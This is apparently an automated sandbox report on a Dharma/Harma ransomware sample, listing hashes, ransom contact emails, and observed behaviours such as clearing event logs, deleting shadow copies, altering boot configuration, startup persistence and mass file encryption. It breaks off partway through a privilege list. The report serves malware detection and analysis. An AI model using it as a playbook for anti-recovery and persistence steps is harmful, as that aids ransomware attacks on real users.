Analysis
-
max time kernel
631s -
max time network
633s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
12-05-2023 13:34
Static task
static1
Behavioral task
behavioral1
Sample
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
Resource
win10v2004-20230220-en
General
-
Target
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
-
Size
1.0MB
-
MD5
5c36e305d926e55ef98d392176890cd2
-
SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd
-
SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
-
SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
SSDEEP
24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM
Malware Config
Extracted
C:\info.hta
decryptioner@uncryptfile.com
decoder@firemail.cc
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 544 wevtutil.exe 948 wevtutil.exe 1268 wevtutil.exe 1720 wevtutil.exe 880 wevtutil.exe 1456 wevtutil.exe 1156 wevtutil.exe 1388 wevtutil.exe 1388 wevtutil.exe 1944 wevtutil.exe 1968 wevtutil.exe 1964 wevtutil.exe 1968 wevtutil.exe 1280 wevtutil.exe 1808 wevtutil.exe 1968 wevtutil.exe 1360 wevtutil.exe 1456 wevtutil.exe 1516 wevtutil.exe 228 wevtutil.exe 1608 wevtutil.exe 1156 wevtutil.exe 216 wevtutil.exe 948 wevtutil.exe 1604 wevtutil.exe 1132 wevtutil.exe 1528 wevtutil.exe 1992 wevtutil.exe 1628 wevtutil.exe 1928 wevtutil.exe 1772 wevtutil.exe 1988 wevtutil.exe 1448 wevtutil.exe 880 wevtutil.exe 1524 wevtutil.exe 1028 wevtutil.exe 1728 wevtutil.exe 1524 wevtutil.exe 1524 wevtutil.exe 1768 wevtutil.exe 672 wevtutil.exe 1964 wevtutil.exe 1084 wevtutil.exe 1604 wevtutil.exe 1768 wevtutil.exe 672 wevtutil.exe 1856 wevtutil.exe 1156 wevtutil.exe 2036 wevtutil.exe 772 wevtutil.exe 828 wevtutil.exe 1084 wevtutil.exe 524 wevtutil.exe 1968 wevtutil.exe 2040 wevtutil.exe 1856 wevtutil.exe 292 wevtutil.exe 1844 wevtutil.exe 1720 wevtutil.exe 1992 wevtutil.exe 1252 wevtutil.exe 1524 wevtutil.exe 1292 wevtutil.exe 1292 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 672 bcdedit.exe 1692 bcdedit.exe -
Processes:
wbadmin.exepid process 1532 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops startup file 3 IoCs
Processes:
attrib.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\X: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Z: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\G: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Q: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\T: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\U: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\F: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\H: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\R: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\W: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\J: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\B: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\P: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\L: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\M: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\N: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\V: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\E: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\I: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\K: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\Y: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\A: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\O: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\S: VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened (read-only) \??\G: vssadmin.exe -
Drops file in Program Files directory 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_F_COL.HXK.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50B.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEMANAGED.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BORDERBB.POC.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PPTICO.EXE.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\VelvetRose.css.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0251301.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left.gif.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MLSHEXT.DLL.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.XML.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\MTEXTRA.TTF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\LAUNCH.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\PREVIEW.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\RPLBRF35.CHM.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00728_.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0252349.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187817.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF.id-32B7E671.[decryptioner@uncryptfile.com].HARMA VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Drops file in Windows directory 4 IoCs
Processes:
wbadmin.exeVirusShare_5c36e305d926e55ef98d392176890cd2.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File created C:\Windows\HRMPRIV VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 316 sc.exe 1736 sc.exe 580 sc.exe 1456 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1988 schtasks.exe 468 schtasks.exe 1448 schtasks.exe 672 schtasks.exe 1800 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1708 vssadmin.exe 468 vssadmin.exe 1960 vssadmin.exe 712 vssadmin.exe 1456 vssadmin.exe 1944 vssadmin.exe 544 vssadmin.exe 1652 vssadmin.exe 828 vssadmin.exe 1252 vssadmin.exe 760 vssadmin.exe 1748 vssadmin.exe 592 vssadmin.exe 2028 vssadmin.exe 216 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1780 taskkill.exe 872 taskkill.exe 948 taskkill.exe 524 taskkill.exe 1348 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
Processes:
rundll32.exerundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2961826002-3968192592-354541192-1000_Classes\Local Settings rundll32.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.exepid process 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeDebugPrivilege 1780 taskkill.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeIncreaseQuotaPrivilege 1948 WMIC.exe Token: SeSecurityPrivilege 1948 WMIC.exe Token: SeTakeOwnershipPrivilege 1948 WMIC.exe Token: SeLoadDriverPrivilege 1948 WMIC.exe Token: SeSystemProfilePrivilege 1948 WMIC.exe Token: SeSystemtimePrivilege 1948 WMIC.exe Token: SeProfSingleProcessPrivilege 1948 WMIC.exe Token: SeIncBasePriorityPrivilege 1948 WMIC.exe Token: SeCreatePagefilePrivilege 1948 WMIC.exe Token: SeBackupPrivilege 1948 WMIC.exe Token: SeRestorePrivilege 1948 WMIC.exe Token: SeShutdownPrivilege 1948 WMIC.exe Token: SeDebugPrivilege 1948 WMIC.exe Token: SeSystemEnvironmentPrivilege 1948 WMIC.exe Token: SeRemoteShutdownPrivilege 1948 WMIC.exe Token: SeUndockPrivilege 1948 WMIC.exe Token: SeManageVolumePrivilege 1948 WMIC.exe Token: 33 1948 WMIC.exe Token: 34 1948 WMIC.exe Token: 35 1948 WMIC.exe Token: SeIncreaseQuotaPrivilege 1948 WMIC.exe Token: SeSecurityPrivilege 1948 WMIC.exe Token: SeTakeOwnershipPrivilege 1948 WMIC.exe Token: SeLoadDriverPrivilege 1948 WMIC.exe Token: 